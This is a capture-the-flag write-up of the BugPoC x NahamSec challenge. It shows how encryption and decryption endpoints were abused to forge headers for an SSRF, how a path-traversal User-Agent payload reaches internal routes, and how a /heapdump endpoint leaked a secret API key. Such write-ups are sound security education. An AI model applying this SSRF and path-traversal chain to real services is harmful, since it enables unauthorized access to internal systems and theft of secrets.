BugPoC x NahamSec CTF write-up: SSRF + internal heapdump

Analysis

After examining the HTTP traffic and script.js the following important things became clear:

  1. There are three hosts:
    • doggo.buggywebsite.com -> which hosts the web front-end components (including script.js).
    • doggo-api.buggywebsite.com -> API which has the /fingerprint and /get-dogs endpoints exposed.
    • buggy-dog-pics.s3-us-west-2.amazonaws.com -> S3 bucket which hosts the dog images.
  2. The application is hosted on AWS infra since all above endpoints return headers such as x-amz-request-id, x-amz-id-2, Apigw-Requestid .
  3. The /get-dogs endpoint does the following:
    • Decrypts the x-param header which is an encrypted Fernet string.
    • It then makes an internal request to “<api-host> + /dogs + decrypted-value-of-x-param”.
    • It returns the path, statusCode and response from the above server-side request.
      • This strongly hinted at an SSRF vuln if the user could forge a valid x-param string. Luckily the /fingerprint allowed us to do exactly this.
    • The path value in response makes this endpoint a useful decryption primitive.
  4. The /fingerprint endpoint returns the Fernet encrypted value of {"UA": <User-Agent-request-header-value>}
    • By passing arbitrary user-agent values, we can generate valid strings which have been encrypted using the server Fernet key and may therefore be useful for SSRF as mentioned above.
    • This endpoint is a useful encryption primitive.
  5. There are some API endpionts which are not accessible to external users:
    • /dogs gives the response: Error, this endpoint is only internally accessible.

Solution steps

  1. In order for the SSRF to work, we need to know if we can actually control the path. Since the path by default begins with /dogs and if we send encrypted data from /fingerprint it will also contain json characters like {\"UA\":\", we will need to do path traversal to have full control over the request path.
  2. To test this, send a request to /fingerprint with User-agent set to %2e%2e%2f%2e%2e%2fdogs?page=1# where %2e and %2f are url-encoded values of . and /. The # at the end makes the rest of the trailing characters like } irrelevant as a url fragment. Use the encrypted fingerprint from the response as the value for x-param header in a request to /get-dogs.
  3. This results in a valid server-side request to /dogs?page=1
    • The /dogs?page=x endpoint just returns an array of 5x-4 to 5x number formatted strings https://buggy-dog-pics.s3-us-west-2.amazonaws.com/dog{number}.jpg.
  4. We may now change the path and parameters to point to other internal endpoints.
  5. After trying and brute-forcing multiple endpoints I still could not figure out what might work until after I saw the hint posted on twitter about heapdumps.
  6. A server-side request sent to /heapdump resulted in, as the name says, heap dump of the python data.
    • Trying the /heapdump endpoint from an external-request gives the same response as that from /dogs: Error, this endpoint is only internally accessible.
    • This confirmed that it is an internal endpoint which could leak sensitive data through SSRF.
  7. The response from the SSRF request made to /heapdump included the SECRET_API_KEY as well and voila, I got the flag :) .

BugPoC python script:

Deadends

I tried a few other things which didn’t work:

  1. Breaking the Fernet encryption scheme:
    • Fernet encryption is pretty robust if used properly. It is not vulnerable to known or chosen-plaintext attacks which I could have used here with the primitives at hand.
    • Since I did not have the encryption key, this was a deadend.
  2. Attacking python requests library URL parsing:
    • I knew python requests library was being used in the backend because once I could control the path of server-side request, if an internal request was sent to /fingerprint, and the resulting string decrypted using /get-dogs, it showed that the User-Agent was python-requests/2.22.0.
    • Knowing this, I tried to have control over the host for SSRF as well but this didn’t work. I tried fooling the url-parsing of python requests library. This would have been possible if the url concatenation would have been like http://<intended-host><any-data-except-fwd-slash-i-guess> + @<attacker-controlled-host> in which case the library would send a request to <attacker-controlled-host> instead of <intended-host>. Unfortunately since we could only add a controlled string after /dogs (which contains a forward slash), this didn’t work out either.
    • This maybe a good CTF challenge idea for a future challenge ;) .

Summary

Overall I liked the task. It required reverse-engineering and understanding how the application back-end might be functioning through the web traffic alone. Getting stuck not knowing what to do after SSRF was frustrating but the hint really helped! Without it, it felt like a guessing task as I was brute-forcing common paths. However, judging from the heap dump itself which contains lambda_function definitions, the /heapdump endpoint might be a common thing for a python aws lambda application which I should have known?